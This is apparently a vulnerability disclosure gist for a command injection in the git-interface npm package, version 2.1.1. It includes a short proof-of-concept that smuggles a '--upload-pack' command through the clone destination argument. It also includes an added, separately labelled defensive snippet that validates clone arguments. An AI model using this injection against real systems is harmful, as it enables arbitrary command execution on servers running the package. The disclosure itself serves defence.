@lirantal
Created April 16, 2022 10:28
Command Injection vulnerability in git-interface@2.1.1


git-interface describes itself as an "Interface to work with a git repository in node.js".

Resources:

Background on exploitation

I'm reporting an OS Command Injection vulnerability in the git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and to supply the destination directory to clone a repository to. If both are provided by user input, the attacker can pass git's --upload-pack command-line option, which git clone also supports, and this allows any operating system command to be spawned by the attacker.

Proof of Concept exploit

Install git-interface@2.1.1, which is the latest version.

Run the following code. As a precondition, the /tmp/new directory needs to exist (it doesn't need to be a .git-initialized directory, though), so you could provide a predictable path such as /usr/src:

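const { Git } = require('git-interface');

// The working directory must already exist on disk
const git = new Git({
  dir: '/tmp/new' // default path is the current directory
});

// The destination argument starts with "--", so git parses it as an option
// instead of a directory name
git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');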

Observe a new file created: /tmp/pwned
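
A defensive counterpart to the proof of concept above, added here as an example; it is not part of the original report and not git-interface's own code. It shows how a caller or wrapper can build the `git clone` argument list so that user input is never parsed as an option. The function names and the scheme allow-list are assumptions made for illustration.

```javascript
const { execFile } = require('child_process');

// Assumption: this application only needs to clone over https or ssh.
// file:// is excluded because the local transport runs the upload-pack
// program on this machine.
const ALLOWED_SCHEMES = new Set(['https:', 'ssh:']);

// True for anything git could interpret as a command-line option.
function isOptionLike(value) {
  return typeof value !== 'string' || value.length === 0 || value.startsWith('-');
}

// Build the argv for `git clone` from untrusted input, or throw.
// (Hypothetical helper, not an API of git-interface.)
function buildCloneArgs(repository, destination) {
  if (isOptionLike(repository) || isOptionLike(destination)) {
    throw new Error('arguments must be non-empty strings that do not start with "-"');
  }
  let url;
  try {
    url = new URL(repository);
  } catch {
    throw new Error('repository must be an absolute URL');
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    throw new Error('URL scheme ' + url.protocol + ' is not allowed');
  }
  // "--" ends option parsing: everything after it is positional,
  // so git treats both values as a URL and a directory name.
  return ['clone', '--', repository, destination];
}

// Run the clone without a shell; argv reaches git exactly as built above.
function safeClone(repository, destination, cwd, callback) {
  const args = buildCloneArgs(repository, destination);
  return execFile('git', args, { cwd }, callback);
}
```

With this check in place, the destination value used in the proof of concept is rejected before git is started.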

Author

Liran Tal
